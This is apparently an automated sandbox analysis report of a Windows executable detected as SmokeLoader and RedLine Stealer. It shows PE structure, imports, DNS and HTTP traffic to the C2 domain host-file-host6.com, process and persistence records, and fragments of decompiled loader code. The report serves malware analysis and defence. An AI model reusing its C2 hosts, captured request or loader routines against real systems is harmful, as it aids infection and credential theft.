                      mov ecx, dword ptr [esp+04h]
                      sub eax, ecx
                      ret
                      cmp ecx, dword ptr [0042006Ch]
                      jne 00007F4DC8D05EF4h
                      rep ret
                      jmp 00007F4DC8D091C3h
                      push eax
                      push dword ptr fs:[00000000h]
                      lea eax, dword ptr [esp+0Ch]
                      sub esp, dword ptr [esp+0Ch]
                      push ebx
                      push esi
                      push edi
                      mov dword ptr [eax], ebp
                      Programming Language:
                      • [ASM] VS2008 build 21022
                      • [ C ] VS2008 build 21022
                      • [IMP] VS2005 build 50727
                      • [C++] VS2008 build 21022
                      • [RES] VS2008 build 21022
                      • [LNK] VS2008 build 21022
                      NameVirtual AddressVirtual Size Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IMPORT0xe10c0x50.text
                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x17c0000x4bf8.rsrc
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                      IMAGE_DIRECTORY_ENTRY_DEBUG0x12100x1c.text
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2c300x40.text
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IAT0x10000x1d8.text
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                      .text0x10000xdc060xde00False0.48134853603603606data5.874806872478882IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      .data0xf0000x16c2fc0x11c00False0.8886168573943662data7.587752029512684IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .rsrc0x17c0000x4bf80x4c00False0.47774465460526316data4.668681479659218IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      NameRVASizeTypeLanguageCountry
                      RT_ICON0x17c2b00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors
                      RT_ICON0x17cb580x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216
                      RT_ICON0x17f1000x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096
                      RT_STRING0x1803a80x42data
                      RT_STRING0x1803f00x280data
                      RT_STRING0x1806700x3cedata
                      RT_STRING0x180a400x1b2data
                      RT_ACCELERATOR0x1801d80x80data
                      RT_GROUP_ICON0x1801a80x30data
                      RT_VERSION0x1802680x140MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
                      None0x1802580xadata
                      DLLImport
                      KERNEL32.dllLoadLibraryA, InterlockedPushEntrySList, GetConsoleAliasesW, ReadFile, ReadConsoleW, GetVolumeInformationA, GetComputerNameA, LocalFree, InterlockedDecrement, SetSystemTimeAdjustment, SetLocaleInfoA, FindNextVolumeA, FindCloseChangeNotification, CopyFileExA, MoveFileWithProgressW, VerifyVersionInfoW, LocalSize, FileTimeToDosDateTime, DebugBreak, GlobalGetAtomNameW, IsBadWritePtr, FindResourceA, GetComputerNameExW, GetProcAddress, GetStringTypeW, GetFileTime, GetConsoleAliasesLengthW, GetVolumeNameForVolumeMountPointA, DeleteVolumeMountPointA, GetCPInfo, PostQueuedCompletionStatus, MoveFileWithProgressA, CopyFileA, lstrcpynW, WriteConsoleW, GetBinaryTypeA, WriteConsoleOutputW, GetCommandLineA, InterlockedIncrement, CreateActCtxW, FormatMessageA, GetModuleHandleW, GetModuleHandleA, LeaveCriticalSection, GetStringTypeExA, OpenMutexW, FindResourceW, RtlCaptureContext, InterlockedExchange, InitializeCriticalSectionAndSpinCount, DeleteFiber, InterlockedExchangeAdd, EnumDateFormatsA, GetPrivateProfileStructA, GetNamedPipeHandleStateW, RegisterWaitForSingleObject, LocalAlloc, QueryMemoryResourceNotification, SetLastError, GetProcessPriorityBoost, GetMailslotInfo, HeapWalk, SetFilePointer, SetConsoleMode, RaiseException, RtlUnwind, GetLastError, MoveFileA, DeleteFileA, GetStartupInfoA, HeapAlloc, HeapFree, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, SetHandleCount, GetFileType, DeleteCriticalSection, HeapCreate, VirtualFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, EnterCriticalSection, VirtualAlloc, HeapReAlloc, HeapSize, GetACP, GetOEMCP, IsValidCodePage, GetLocaleInfoA, GetStringTypeA, MultiByteToWideChar, LCMapStringA, LCMapStringW
                      USER32.dllCharUpperBuffW
                      WINHTTP.dllWinHttpCreateUrl
                      TimestampSource PortDest PortSource IPDest IP
                      Oct 3, 2022 15:59:23.101623058 CEST4970380192.168.2.7176.124.192.17
                      Oct 3, 2022 15:59:23.158726931 CEST8049703176.124.192.17192.168.2.7
                      Oct 3, 2022 15:59:23.158838034 CEST4970380192.168.2.7176.124.192.17
                      Oct 3, 2022 15:59:23.158982992 CEST4970380192.168.2.7176.124.192.17
                      Oct 3, 2022 15:59:23.159025908 CEST4970380192.168.2.7176.124.192.17
                      Oct 3, 2022 15:59:23.215492964 CEST8049703176.124.192.17192.168.2.7
                      Oct 3, 2022 15:59:23.215522051 CEST8049703176.124.192.17192.168.2.7
                      Oct 3, 2022 15:59:23.225384951 CEST8049703176.124.192.17192.168.2.7
                      Oct 3, 2022 15:59:23.225481987 CEST4970380192.168.2.7176.124.192.17
                      Oct 3, 2022 15:59:23.227018118 CEST4970380192.168.2.7176.124.192.17
                      Oct 3, 2022 15:59:23.283112049 CEST8049703176.124.192.17192.168.2.7
                      TimestampSource PortDest PortSource IPDest IP
                      Oct 3, 2022 15:59:22.755625010 CEST5947753192.168.2.78.8.8.8
                      Oct 3, 2022 15:59:23.084805012 CEST53594778.8.8.8192.168.2.7
                      Oct 3, 2022 15:59:23.237786055 CEST5575253192.168.2.78.8.8.8
                      Oct 3, 2022 15:59:24.234636068 CEST5575253192.168.2.78.8.8.8
                      Oct 3, 2022 15:59:25.265894890 CEST5575253192.168.2.78.8.8.8
                      Oct 3, 2022 15:59:27.263375998 CEST53557528.8.8.8192.168.2.7
                      Oct 3, 2022 15:59:28.261560917 CEST53557528.8.8.8192.168.2.7
                      Oct 3, 2022 15:59:29.293272972 CEST53557528.8.8.8192.168.2.7
                      TimestampSource IPDest IPChecksumCodeType
                      Oct 3, 2022 15:59:28.261730909 CEST192.168.2.78.8.8.8cffa(Port unreachable)Destination Unreachable
                      Oct 3, 2022 15:59:29.293365955 CEST192.168.2.78.8.8.8cffa(Port unreachable)Destination Unreachable
                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                      Oct 3, 2022 15:59:22.755625010 CEST192.168.2.78.8.8.80x1f55Standard query (0)host-file-host6.comA (IP address)IN (0x0001)false
                      Oct 3, 2022 15:59:23.237786055 CEST192.168.2.78.8.8.80xb9d5Standard query (0)host-host-file8.comA (IP address)IN (0x0001)false
                      Oct 3, 2022 15:59:24.234636068 CEST192.168.2.78.8.8.80xb9d5Standard query (0)host-host-file8.comA (IP address)IN (0x0001)false
                      Oct 3, 2022 15:59:25.265894890 CEST192.168.2.78.8.8.80xb9d5Standard query (0)host-host-file8.comA (IP address)IN (0x0001)false
                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                      Oct 3, 2022 15:59:23.084805012 CEST8.8.8.8192.168.2.70x1f55No error (0)host-file-host6.com176.124.192.17A (IP address)IN (0x0001)false
                      Oct 3, 2022 15:59:27.263375998 CEST8.8.8.8192.168.2.70xb9d5Server failure (2)host-host-file8.comnonenoneA (IP address)IN (0x0001)false
                      Oct 3, 2022 15:59:28.261560917 CEST8.8.8.8192.168.2.70xb9d5Server failure (2)host-host-file8.comnonenoneA (IP address)IN (0x0001)false
                      Oct 3, 2022 15:59:29.293272972 CEST8.8.8.8192.168.2.70xb9d5Server failure (2)host-host-file8.comnonenoneA (IP address)IN (0x0001)false
                      • ucdldn.net
                        • host-file-host6.com
                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      0192.168.2.749703176.124.192.1780C:\Windows\explorer.exe
                      TimestampkBytes transferredDirectionData
                      Oct 3, 2022 15:59:23.158982992 CEST103OUTPOST / HTTP/1.1
                      Connection: Keep-Alive
                      Content-Type: application/x-www-form-urlencoded
                      Accept: */*
                      Referer: http://ucdldn.net/
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                      Content-Length: 334
                      Host: host-file-host6.com
                      Oct 3, 2022 15:59:23.159025908 CEST103OUTData Raw: 10 87 8a 92 6f f1 d1 b4 be 49 0d 3b 0f c2 e5 fb 35 11 a3 44 d6 41 6c ed c2 9a af f1 f9 af 93 82 6c b3 58 d5 68 1b cc e3 e1 af f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 43 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 4b 99 db 30
                      Data Ascii: oI;5DAllXhwmCu$f]dK01@?&JypkjC^f6]Nw_{OD$g`D?,>'(7(KLW$G(RjUz$|7Y1>Q=ydqJ!5Ux+Wy6!
                      Oct 3, 2022 15:59:23.225384951 CEST104INHTTP/1.1 200 OK
                      Server: nginx/1.20.1
                      Date: Mon, 03 Oct 2022 13:59:23 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: close
                      Data Raw: 66 0d 0a 59 6f 75 72 20 49 50 20 62 6c 6f 63 6b 65 64 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: fYour IP blocked0


                      Click to jump to process

                      Click to jump to process

                      Click to dive into process behavior distribution

                      Click to jump to process

                      Target ID:0
                      Start time:15:58:26
                      Start date:03/10/2022
                      Path:C:\Users\user\Desktop\file.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Users\user\Desktop\file.exe
                      Imagebase:0x400000
                      File size:150016 bytes
                      MD5 hash:E337A4D30D5B3CC3BCF3D3789DAD3566
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.327668635.00000000006B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000003.243844808.00000000006C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.327792065.0000000000860000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.327792065.0000000000860000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.327934318.00000000008BA000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.327822813.0000000000881000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.327822813.0000000000881000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                      Reputation:low

                      Target ID:1
                      Start time:15:58:34
                      Start date:03/10/2022
                      Path:C:\Windows\explorer.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\Explorer.EXE
                      Imagebase:0x7ff75ed40000
                      File size:3933184 bytes
                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000000.316092532.0000000002671000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000001.00000000.316092532.0000000002671000.00000020.80000000.00040000.00000000.sdmp, Author: unknown
                      Reputation:high

                      Target ID:11
                      Start time:15:59:22
                      Start date:03/10/2022
                      Path:C:\Users\user\AppData\Roaming\vbfvrba
                      Wow64 process (32bit):true
                      Commandline:C:\Users\user\AppData\Roaming\vbfvrba
                      Imagebase:0x400000
                      File size:150016 bytes
                      MD5 hash:E337A4D30D5B3CC3BCF3D3789DAD3566
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000B.00000002.377030181.00000000021F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000B.00000002.377030181.00000000021F0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000B.00000003.364685451.00000000021B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000000B.00000002.376837614.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000B.00000002.377400822.0000000002231000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000B.00000002.377400822.0000000002231000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000B.00000002.376742347.00000000005E9000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                      Antivirus matches:
                      • Detection: 100%, Joe Sandbox ML
                      Reputation:low

                      Target ID:14
                      Start time:16:00:01
                      Start date:03/10/2022
                      Path:C:\Users\user\AppData\Roaming\vbfvrba
                      Wow64 process (32bit):true
                      Commandline:C:\Users\user\AppData\Roaming\vbfvrba
                      Imagebase:0x400000
                      File size:150016 bytes
                      MD5 hash:E337A4D30D5B3CC3BCF3D3789DAD3566
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000E.00000002.458450131.00000000005B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000E.00000002.458450131.00000000005B0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000E.00000003.446586296.00000000005B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000000E.00000002.458435299.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000E.00000002.458781769.00000000021D1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000E.00000002.458781769.00000000021D1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000E.00000002.458600340.00000000005EE000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                      Reputation:low

                      Reset < >

                        Execution Graph

                        Execution Coverage:8.9%
                        Dynamic/Decrypted Code Coverage:58.6%
                        Signature Coverage:20.7%
                        Total number of Nodes:116
                        Total number of Limit Nodes:8
                        execution_graph 2797 6b0001 2798 6b0005 2797->2798 2803 6b092b GetPEB 2798->2803 2800 6b0030 2805 6b003c 2800->2805 2804 6b0972 2803->2804 2804->2800 2806 6b0049 2805->2806 2807 6b0e0f 2 API calls 2806->2807 2808 6b0223 2807->2808 2809 6b0d90 GetPEB 2808->2809 2810 6b0238 VirtualAlloc 2809->2810 2811 6b0265 2810->2811 2812 6b02ce VirtualProtect 2811->2812 2814 6b030b 2812->2814 2813 6b0439 VirtualFree 2817 6b04be LoadLibraryA 2813->2817 2814->2813 2816 6b08c7 2817->2816 2818 6b0005 2819 6b092b GetPEB 2818->2819 2820 6b0030 2819->2820 2821 6b003c 7 API calls 2820->2821 2822 6b0038 2821->2822 2720 402ad1 2721 402ad2 2720->2721 2723 402b56 2721->2723 2724 40180c 2721->2724 2725 40181b 2724->2725 2726 40183e Sleep 2725->2726 2728 401859 2726->2728 2727 40186a NtTerminateProcess 2729 401876 2727->2729 2728->2727 2729->2723 2730 40b675 2731 40b73f __freea 2730->2731 2732 40b6b5 __crtLCMapStringA_stat 2730->2732 2732->2731 2734 4091b3 2732->2734 2736 4091bc 2734->2736 2737 4091f9 2736->2737 2738 40a71a 2736->2738 2737->2731 2741 40a726 __calloc_impl 2738->2741 2739 40a7cf RtlAllocateHeap 2739->2741 2740 40a73e 2740->2736 2741->2739 2741->2740 2742 6b003c 2743 6b0049 2742->2743 2755 6b0e0f SetErrorMode SetErrorMode 2743->2755 2748 6b0265 2749 6b02ce VirtualProtect 2748->2749 2751 6b030b 2749->2751 2750 6b0439 VirtualFree 2754 6b04be LoadLibraryA 2750->2754 2751->2750 2753 6b08c7 2754->2753 2756 6b0223 2755->2756 2757 6b0d90 2756->2757 2758 6b0dad 2757->2758 2759 6b0dbb GetPEB 2758->2759 2760 6b0238 VirtualAlloc 2758->2760 2759->2760 2760->2748 2779 401818 2780 40181b 2779->2780 2781 40183e Sleep 2780->2781 2783 401859 2781->2783 2782 40186a NtTerminateProcess 2784 401876 2782->2784 2783->2782 2761 8be791 2764 8be7a1 2761->2764 2765 8be7b0 2764->2765 2768 8bef41 2765->2768 2769 8bef5c 2768->2769 2770 8bef65 CreateToolhelp32Snapshot 2769->2770 2771 8bef81 Module32First 2769->2771 2770->2769 2770->2771 2772 8bef90 2771->2772 2774 8be7a0 2771->2774 2775 8bec00 2772->2775 2776 8bec2b 2775->2776 2777 8bec74 2776->2777 2778 8bec3c VirtualAlloc 2776->2778 2777->2777 2778->2777 2837 4096ba 2839 4096e1 2837->2839 2844 4097a0 2839->2844 2845 40aee0 2839->2845 2843 40b315 ___crtLCMapStringA RtlAllocateHeap 2843->2844 2846 40aef3 _LocaleUpdate::_LocaleUpdate 2845->2846 2853 40ad26 2846->2853 2848 40975b 2849 40b315 2848->2849 2850 40b328 _LocaleUpdate::_LocaleUpdate 2849->2850 2882 40af70 2850->2882 2852 40977b 2852->2843 2854 40ad47 2853->2854 2858 40ad5f __crtLCMapStringA_stat __freea 2854->2858 2859 40b62c 2854->2859 2858->2848 2860 40b656 2859->2860 2861 40ae7d 2860->2861 2867 40a704 2860->2867 2861->2858 2863 40b675 2861->2863 2864 40b73f __freea 2863->2864 2865 40b6b5 __crtLCMapStringA_stat 2863->2865 2864->2858 2865->2864 2866 4091b3 __calloc_crt RtlAllocateHeap 2865->2866 2866->2864 2870 40b592 2867->2870 2871 40b5ab 2870->2871 2874 40b363 2871->2874 2875 40b378 _LocaleUpdate::_LocaleUpdate 2874->2875 2877 40a715 2875->2877 2878 40b829 2875->2878 2877->2861 2879 40b83d __isleadbyte_l _LocaleUpdate::_LocaleUpdate 2878->2879 2880 40aee0 ___crtGetStringTypeA RtlAllocateHeap 2879->2880 2881 40b84a 2879->2881 2880->2881 2881->2875 2883 40af91 2882->2883 2884 40b62c ___ansicp RtlAllocateHeap 2883->2884 2889 40b006 __crtLCMapStringA_stat __freea 2883->2889 2885 40b1d2 2884->2885 2886 40b675 ___convertcp RtlAllocateHeap 2885->2886 2885->2889 2887 40b1fd __crtLCMapStringA_stat 2886->2887 2888 40b675 ___convertcp RtlAllocateHeap 2887->2888 2887->2889 2888->2889 2889->2852 2833 402a9d 2835 402ad2 2833->2835 2834 402b56 2835->2834 2836 40180c 2 API calls 2835->2836 2836->2834

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 85 40180c-40185b call 401140 Sleep call 401381 96 40186a-401870 NtTerminateProcess 85->96 97 40185d-401865 call 401455 85->97 99 40187f 96->99 97->96 100 401882-4018a2 call 401140 99->100 101 401876-40187b 99->101 101->100
                        C-Code - Quality: 23%
                        			E0040180C(void* __eflags, void* __fp0, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                        				char _v8;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				void* __ebp;
                        				void* _t11;
                        				void* _t16;
                        				intOrPtr* _t17;
                        				void* _t19;
                        				void* _t20;
                        				void* _t21;
                        
                        				_t22 = __eflags;
                        				L00401140(0x183e, _t16, _t20, _t21, __eflags, __fp0);
                        				_t17 = _a4;
                        				Sleep(0x1388);
                        				_t11 = E00401381(_t19, _t22, _t17, _a8, _a12,  &_v8); // executed
                        				if(_t11 != 0) {
                        					_push(_a16);
                        					_push(_v8);
                        					_push(_t11);
                        					_push(_t17); // executed
                        					L00401455(0x60, _t19, _t20); // executed
                        				}
                        				 *_t17(0xffffffff, 0); // executed
                        				_t17 = _t17 + 0x60;
                        				_push(0x60);
                        				asm("pushad");
                        				__ecx =  *__esp;
                        				__esp = __esp + 4;
                        				return __eax;
                        			}














                        0x0040180c
                        0x00401839
                        0x0040183e
                        0x00401846
                        0x00401854
                        0x0040185b
                        0x0040185d
                        0x00401860
                        0x00401863
                        0x00401864
                        0x00401865
                        0x00401865
                        0x0040186e
                        0x0040187a
                        0x0040188a
                        0x0040188b
                        0x0040188c
                        0x0040188f
                        0x004018a2

                        APIs
                        • Sleep.KERNELBASE(00001388), ref: 00401846
                        • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                        Memory Dump Source
                        • Source File: 00000000.00000002.327476608.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Similarity
                        • API ID: ProcessSleepTerminate
                        • String ID:
                        • API String ID: 417527130-0
                        • Opcode ID: 48605b2c447a37bcbfe7e2e744f1bc94e20697bf77b90fed00f3eac78df6e713
                        • Instruction ID: 439418bc6b8cc85bb90c3f715c5c8777bd26b3ffbf7cafd5698f886abb68661d
                        • Opcode Fuzzy Hash: 48605b2c447a37bcbfe7e2e744f1bc94e20697bf77b90fed00f3eac78df6e713
                        • Instruction Fuzzy Hash: DA014F73608208E7DB057A968C41ABA36299B04754F24C137BA13791F1D63DCB12A76B
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 107 401818-40185b call 401140 Sleep call 401381 117 40186a-40187f NtTerminateProcess 107->117 118 40185d-401865 call 401455 107->118 121 401882-4018a2 call 401140 117->121 122 401876-40187b 117->122 118->117 122->121
                        APIs
                        • Sleep.KERNELBASE(00001388), ref: 00401846
                        • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                        Memory Dump Source
                        • Source File: 00000000.00000002.327476608.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Similarity
                        • API ID: ProcessSleepTerminate
                        • String ID:
                        • API String ID: 417527130-0
                        • Opcode ID: 735c82c96fcbea7bf12158d9a4ead4c90c858f64146e6fe56e595d73795e62df
                        • Instruction ID: 3ccd72cbf6c862e7ac88a574d3d4d63140f03618044998c1cc11cf15f2003e8a
                        • Opcode Fuzzy Hash: 735c82c96fcbea7bf12158d9a4ead4c90c858f64146e6fe56e595d73795e62df
                        • Instruction Fuzzy Hash: F5F03133604204E7DB047E96CC41ABA36199B04754F24C537BA13791F1D63DCB12A76B
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 128 401822-40185b call 401140 Sleep call 401381 139 40186a-40187f NtTerminateProcess 128->139 140 40185d-401865 call 401455 128->140 143 401882-4018a2 call 401140 139->143 144 401876-40187b 139->144 140->139 144->143
                        C-Code - Quality: 17%
                        			E00401822(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                        				void* _t11;
                        				intOrPtr* _t17;
                        				void* _t19;
                        				void* _t22;
                        
                        				_t23 = __eflags;
                        				asm("out 0x95, eax");
                        				L00401140(0x183e, __ebx, __edi, __esi, __eflags, __fp0);
                        				_t17 =  *((intOrPtr*)(_t22 + 8));
                        				Sleep(0x1388);
                        				_t11 = E00401381(_t19, _t23, _t17,  *((intOrPtr*)(_t22 + 0xc)),  *((intOrPtr*)(_t22 + 0x10)), _t22 - 4); // executed
                        				if(_t11 != 0) {
                        					_push( *((intOrPtr*)(_t22 + 0x14)));
                        					_push( *((intOrPtr*)(_t22 - 4)));
                        					_push(_t11);
                        					_push(_t17); // executed
                        					L00401455(0x60, _t19, __edi); // executed
                        				}
                        				 *_t17(0xffffffff, 0); // executed
                        				_t17 = _t17 + 0x60;
                        				_push(0x60);
                        				asm("pushad");
                        				__ecx =  *__esp;
                        				__esp = __esp + 4;
                        				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
                        				_pop(__edi);
                        				_pop(__esi);
                        				_pop(__ebx);
                        				__esp = __ebp;
                        				_pop(__ebp);
                        				return __eax;
                        			}







                        0x00401822
                        0x00401822
                        0x00401839
                        0x0040183e
                        0x00401846
                        0x00401854
                        0x0040185b
                        0x0040185d
                        0x00401860
                        0x00401863
                        0x00401864
                        0x00401865
                        0x00401865
                        0x0040186e
                        0x0040187a
                        0x0040188a
                        0x0040188b
                        0x0040188c
                        0x0040188f
                        0x00401899
                        0x0040189e
                        0x0040189f
                        0x004018a0
                        0x004018a1
                        0x004018a1
                        0x004018a2

                        APIs
                        • Sleep.KERNELBASE(00001388), ref: 00401846
                        • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                        Memory Dump Source
                        • Source File: 00000000.00000002.327476608.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Similarity
                        • API ID: ProcessSleepTerminate
                        • String ID:
                        • API String ID: 417527130-0
                        • Opcode ID: a194699a847889707888bec4c97d3b5ba1a2af2b109fbbf12831e69875d24230
                        • Instruction ID: 86529ff08739d4d45ab2b2fe3aa627bb4dd9aa569924de5dc1b0fc6937d585b1
                        • Opcode Fuzzy Hash: a194699a847889707888bec4c97d3b5ba1a2af2b109fbbf12831e69875d24230
                        • Instruction Fuzzy Hash: FEF03133604204EBDB047E96C841ABA36299B44754F24C537BA13B91F1D63DCB12A76B
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 150 8bef41-8bef5a 151 8bef5c-8bef5e 150->151 152 8bef60 151->152 153 8bef65-8bef71 CreateToolhelp32Snapshot 151->153 152->153 154 8bef73-8bef79 153->154 155 8bef81-8bef8e Module32First 153->155 154->155 160 8bef7b-8bef7f 154->160 156 8bef90-8bef91 call 8bec00 155->156 157 8bef97-8bef9f 155->157 161 8bef96 156->161 160->151 160->155 161->157
                        APIs
                        • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 008BEF69
                        • Module32First.KERNEL32(00000000,00000224), ref: 008BEF89
                        Memory Dump Source
                        • Source File: 00000000.00000002.327934318.00000000008BA000.00000040.00000020.00020000.00000000.sdmp, Offset: 008BA000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8ba000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateFirstModule32SnapshotToolhelp32
                        • String ID:
                        • API String ID: 3833638111-0
                        • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                        • Instruction ID: 9158142801f067bedf8eee4c8db06a6539383a7ca18a472298756b46758e5a48
                        • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                        • Instruction Fuzzy Hash: 16F06235500714AFD7202AF9A88DBFE76E8FF49725F100668E646D12C1DB70E8454661
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
